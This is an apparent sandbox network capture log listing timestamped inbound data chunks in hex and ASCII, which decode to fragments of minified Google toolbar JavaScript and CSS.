2021-09-14 14:03:24 UTC	59	IN	Data Raw: 3d 63 7d 3b 0a 5f 2e 4b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 42 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 6a 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 47 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 44 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 46 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 4a 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 43 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 41 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 6f 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 4b 3d 6e 65 77 20 5f 2e 78 64 7d 3b 5f 2e 68 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 68 2e 46 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 7d 3b 5f 2e 68 2e 4e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 Data Ascii: =c};_.K=function(){this.B=new _.xd;this.j=new _.xd;this.G=new _.xd;this.D=new _.xd;this.F=new _.xd;this.J=new _.xd;this.C=new _.xd;this.A=new _.xd;this.o=new _.xd;this.K=new _.xd};_.h=_.K.prototype;_.h.Fi=function(){return this.B};_.h.Ni=function(){retur
2021-09-14 14:03:24 UTC	61	IN	Data Raw: 72 6f 74 6f 74 79 70 65 2e 4d 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 68 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 6a 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 6b 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 79 69 3b 5f 2e 77 28 22 67 62 61 72 2e 61 22 2c 5f 2e 4b 2e 6a 28 29 29 3b 76 61 72 20 49 64 3d 6e 65 77 20 51 63 28 77 69 6e 64 6f 77 29 3b 5f 2e 67 64 28 22 61 70 69 22 2c 49 64 29 3b 0a 76 61 72 20 4a 64 3d 5f 2e 44 64 28 29 7c 7c 6e 65 77 20 5f 2e 50 63 2c 4b 64 3d 5f 2e 70 28 5f 2e 45 28 4a 64 2c 38 29 29 3b 77 69 6e 64 6f Data Ascii: rototype.Mi;_.K.prototype.bh=_.K.prototype.Ji;_.K.prototype.bi=_.K.prototype.Ki;_.K.prototype.bj=_.K.prototype.zi;_.K.prototype.bk=_.K.prototype.yi;_.w("gbar.a",_.K.j());var Id=new Qc(window);_.gd("api",Id);var Jd=_.Dd()\|\|new _.Pc,Kd=_.p(_.E(Jd,8));windo
2021-09-14 14:03:24 UTC	62	IN	Data Raw: 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 67 62 5f 56 61 3a 6e 6f 74 28 2e 67 62 5f 45 64 29 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7a 2d 69 6e 64 65 78 3a 39 38 36 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 62 5f 5f 61 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 61 2e 67 62 5f 5a 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 34 32 38 35 66 34 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78 Data Ascii: ight:100%;margin:0;padding:0}.gb_Va:not(.gb_Ed){font:13px/27px Roboto,RobotoDraft,Arial,sans-serif;z-index:986}@keyframes gb__a{0%{opacity:0}50%{opacity:1}}a.gb_Z{border:none;color:#4285f4;cursor:default;font-weight:bold;outline:none;position:relative;tex
2021-09-14 14:03:24 UTC	63	IN	Data Raw: 61 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 23 67 62 20 61 2e 67 62 5f 33 2e 67 62 5f 33 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 67 62 5f 33 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 7d 2e 67 62 5f 33 3a 61 63 74 69 76 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 63 37 38 64 63 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 63 37 61 65 34 2c 23 33 66 37 36 64 33 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 63 37 61 65 34 Data Ascii: a,GradientType=0)}#gb a.gb_3.gb_3{color:#fff}.gb_3:hover{box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_3:active{box-shadow:inset 0 2px 0 rgba(0,0,0,.15);background:#3c78dc;background:-ms-linear-gradient(top,#3c7ae4,#3f76d3);background:linear-gradient(top,#3c7ae4
2021-09-14 14:03:24 UTC	64	IN	Data Raw: 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 38 70 78 3b 74 6f 70 3a 36 32 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 62 5f 5f 61 20 2e 32 73 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 20 2e 67 62 5f 58 61 2c 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 20 2e 67 62 5f 5a 61 2c 2e 67 62 5f 62 64 2e 67 62 Data Ascii: olor:rgba(0,0,0,.2);color:#000;box-shadow:0 2px 10px rgba(0,0,0,.2);display:none;outline:none;overflow:hidden;position:absolute;right:8px;top:62px;animation:gb__a .2s;border-radius:2px;-ms-user-select:text}.gb_bd.gb_la .gb_Xa,.gb_bd.gb_la .gb_Za,.gb_bd.gb
2021-09-14 14:03:24 UTC	66	IN	Data Raw: 6f 6e 3a 68 6f 76 65 72 20 73 76 67 2c 2e 67 62 5f 43 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 30 38 29 7d 2e 67 62 5f 69 61 20 2e 67 62 5f 43 2e 67 62 5f 4d 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 2c 2e 67 62 5f 43 3a 68 6f 76 65 72 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 39 35 2c 39 39 2c 31 30 34 2c 30 2e 32 34 29 7d 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 20 2e 67 62 5f 56 65 2c 2e 67 62 5f 43 5b 61 72 69 61 Data Ascii: on:hover svg,.gb_C:hover{background-color:rgba(60,64,67,0.08)}.gb_ia .gb_C.gb_Ma:hover{background-color:transparent}.gb_C[aria-expanded=true],.gb_C:hover[aria-expanded=true]{background-color:rgba(95,99,104,0.24)}.gb_C[aria-expanded=true] .gb_Ve,.gb_C[aria
2021-09-14 14:03:24 UTC	67	IN	Data Raw: 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 6f 70 Data Ascii: oogle Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;letter-spacing:0.25px;line-height:48px;margin-bottom:2px;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top
2021-09-14 14:03:24 UTC	68	IN	Data Raw: 6f 6e 74 65 6e 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 6d 69 6e 2d 63 6f 6e 74 65 6e 74 7d 2e 67 62 5f 70 61 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 20 2e 67 62 5f 4a 64 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 2e 67 62 5f 70 61 2e 67 62 5f 51 64 20 2e 67 62 5f 4a 64 7b 2d 6d 73 2d 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 7d 2e 67 62 5f 70 61 20 2e 67 62 5f 4a 64 2e 67 62 5f 52 64 2e 67 62 5f 53 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 4a 64 7b 70 61 64 64 69 6e 67 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 49 64 7b 68 65 69 67 68 74 3a 34 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 Data Ascii: ontent;min-width:min-content}.gb_pa:not(.gb_qa) .gb_Jd{padding:8px}.gb_pa.gb_Qd .gb_Jd{-ms-flex:1 0 auto;flex:1 0 auto}.gb_pa .gb_Jd.gb_Rd.gb_Sd{min-width:0}.gb_pa.gb_qa .gb_Jd{padding:4px;padding-left:8px;min-width:0}.gb_Id{height:48px;vertical-align:mid
2021-09-14 14:03:24 UTC	69	IN	Data Raw: 64 69 6e 67 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 67 62 5f 33 64 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 34 73 7d 2e 67 62 5f 34 64 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 7d 2e 67 62 5f 76 63 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 7d 2e 67 62 5f 70 61 20 61 2c 2e 67 62 5f 41 63 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 67 62 5f 73 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 37 29 7d 2e 67 62 5f 70 61 20 73 76 67 2c 2e 67 62 5f 41 63 20 73 76 67 2c 2e 67 62 5f 57 63 20 2e 67 62 5f 35 64 2c 2e 67 62 5f 4d 63 Data Ascii: ding:0 12px;text-overflow:ellipsis;white-space:nowrap;-ms-user-select:text}.gb_3d{transition:background-color .4s}.gb_4d{color:black}.gb_vc{color:white}.gb_pa a,.gb_Ac a{color:inherit}.gb_s{color:rgba(0,0,0,0.87)}.gb_pa svg,.gb_Ac svg,.gb_Wc .gb_5d,.gb_Mc
2021-09-14 14:03:24 UTC	71	IN	Data Raw: 67 62 5f 33 2e 67 62 5f 33 2e 67 62 5f 39 64 2c 23 67 62 20 61 2e 67 62 5f 32 2e 67 62 5f 32 2e 67 62 5f 39 64 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 62 37 64 65 39 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 33 29 2c 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 31 35 29 7d 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 66 6f 63 75 73 2c 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 30 39 34 65 64 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 Data Ascii: gb_3.gb_3.gb_9d,#gb a.gb_2.gb_2.gb_9d{cursor:pointer}.gb_3.gb_9d:hover{background:#2b7de9;box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_3.gb_9d:focus,.gb_3.gb_9d:hover:focus{background:#5094ed;box-shadow:0 1px 2px 0 r
2021-09-14 14:03:24 UTC	72	IN	Data Raw: 63 75 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 61 36 63 36 66 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 67 62 20 61 2e 67 62 5f 39 64 2e 67 62 5f 32 3a 61 63 74 69 76 65 2c 23 67 62 20 2e 67 62 5f 76 63 20 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 2c 23 67 62 2e 67 62 5f 76 63 20 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 63 66 33 66 65 7d 23 67 62 20 61 2e 67 62 5f 33 2e 67 62 5f 6a 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 61 31 63 33 66 39 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 33 29 2c 30 20 Data Ascii: cus:hover{background:#a6c6fa;border-color:transparent;box-shadow:none}#gb a.gb_9d.gb_2:active,#gb .gb_vc a.gb_9d:active,#gb.gb_vc a.gb_9d:active{background:#ecf3fe}#gb a.gb_3.gb_ja.gb_9d:active{background:#a1c3f9;box-shadow:0 1px 2px rgba(60,64,67,0.3),0
2021-09-14 14:03:24 UTC	73	IN	Data Raw: 31 70 78 20 73 6f 6c 69 64 20 23 35 66 36 33 36 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 34 33 38 7d 2e 67 62 5f 6d 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 37 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 77 69 64 74 68 3a 37 38 70 78 7d 2e 67 62 5f 69 61 2e 67 62 5f 6a 61 20 2e 67 62 5f 6d 61 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 37 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d Data Ascii: 1px solid #5f6368;background-color:#333438}.gb_ma{display:inline-block;padding-left:7px;padding-bottom:2px;text-align:center;vertical-align:middle;line-height:32px;width:78px}.gb_ia.gb_ja .gb_ma{line-height:26px;width:72px;padding-left:0;padding-bottom:0}
2021-09-14 14:03:24 UTC	75	IN	Data Raw: 2d 72 61 74 69 6f 3a 31 2e 32 35 29 7b 2e 67 62 5f 43 61 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 7d 2e 67 62 5f 48 61 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72 Data Ascii: -ratio:1.25){.gb_Ca::before{display:inline-block;-ms-transform:scale(.5);transform:scale(.5);-ms-transform-origin:left 0;transform-origin:left 0}.gb_Ha::before{display:inline-block;-ms-transform:scale(.5);transform:scale(.5);-ms-transform-origin:left 0;tr
2021-09-14 14:03:24 UTC	76	IN	Data Raw: 68 6f 76 65 72 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 20 2c 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 20 7d 2e 67 62 5f 50 61 20 2e 67 62 5f 4e 61 2c 2e 67 62 5f 51 61 20 2e 67 62 5f 4e 61 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 70 78 7d 2e 67 62 5f 4e 61 2e 67 62 5f 68 2c 2e 67 62 5f 52 61 2e 67 62 5f 68 2c 2e 67 62 5f 4d 61 2e 67 62 5f 68 7b 66 6c 65 78 3a 30 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 31 20 6d 61 69 6e 2d 73 69 7a 65 7d 2e 67 62 Data Ascii: hover,.gb_i .gb_Ca:hover,.gb_D .gb_Ca:focus,.gb_i .gb_Ca:focus{box-shadow: 0 1px 0 rgba(0,0,0,.15) , 0 1px 2px rgba(0,0,0,.2) }.gb_Pa .gb_Na,.gb_Qa .gb_Na{position:absolute;right:1px}.gb_Na.gb_h,.gb_Ra.gb_h,.gb_Ma.gb_h{flex:0 1 auto;flex:0 1 main-size}.gb
2021-09-14 14:03:24 UTC	77	IN	Data Raw: 38 30 30 30 0d 0a 63 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 67 62 5f 32 63 20 2e 67 62 5f 36 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 38 70 78 3b 72 69 67 68 74 3a 32 34 70 78 7d 2e 67 62 5f 36 63 20 2e 67 62 5f 37 63 7b 68 65 69 67 68 74 3a 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 2d 2e 32 35 65 6d 20 31 30 70 78 20 2d 2e 32 35 65 6d 20 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 74 6f 70 3b 77 69 64 74 68 3a 31 2e 35 65 6d 7d 2e 67 62 5f 38 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 63 6f 6c Data Ascii: 8000c{background-color:inherit}.gb_2c .gb_6c{display:inline-block;position:absolute;top:18px;right:24px}.gb_6c .gb_7c{height:1.5em;margin:-.25em 10px -.25em 0;vertical-align:text-top;width:1.5em}.gb_8c{line-height:20px;font-size:16px;font-weight:700;col
2021-09-14 14:03:24 UTC	78	IN	Data Raw: 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 30 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 67 62 5f 5a 2e 67 62 5f 6b 64 2e 67 62 5f 6a 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 63 6f 6c 6f 72 3a 23 35 66 Data Ascii: oto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;letter-spacing:0.25px;line-height:16px;min-width:70px;outline:none;text-transform:none}.gb_Z.gb_kd.gb_jd{border-radius:4px;box-sizing:border-box;cursor:pointer;height:36px;color:#5f
2021-09-14 14:03:24 UTC	80	IN	Data Raw: 74 6f 6d 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 5f 6c 64 20 2e 67 62 5f 6d 64 2c 2e 67 62 5f 6c 64 20 2e 67 62 5f 6e 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 62 37 64 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 33 29 2c 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 31 35 29 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 66 6f 63 Data Ascii: tom:0;white-space:nowrap}.gb_ld .gb_md,.gb_ld .gb_nd{margin-left:12px;text-transform:none}a.gb_3.gb_md:hover{background-color:#2b7de9;border-color:transparent;box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}a.gb_3.gb_md:foc
2021-09-14 14:03:24 UTC	81	IN	Data Raw: 67 69 6e 3a 30 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 33 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 64 39 30 66 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 31 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 67 62 5f 63 64 20 61 2e 67 62 5f 33 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 52 6f 62 6f Data Ascii: gin:0}.gb_cd .gb_3c{background:#4d90fe;border:2px solid transparent;box-sizing:border-box;font-weight:500;margin-top:21px;min-width:70px;text-align:center}.gb_cd a.gb_3{background:#1a73e8;border-radius:4px;color:#ffffff;font-family:Google Sans,Roboto,Robo
2021-09-14 14:03:24 UTC	82	IN	Data Raw: 68 3a 34 38 70 78 7d 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 33 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 33 32 36 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 79 64 20 2e 67 62 5f 70 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 35 34 70 78 3b 77 69 64 74 68 3a 32 35 34 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 77 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 67 62 5f 42 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 Data Ascii: h:48px}.gb_pd{padding-left:13px;width:100%}.gb_cd .gb_pd{padding-top:4px;min-width:326px;padding-left:0px;width:326px}.gb_cd.gb_yd .gb_pd{min-width:254px;width:254px}.gb_cd.gb_wd 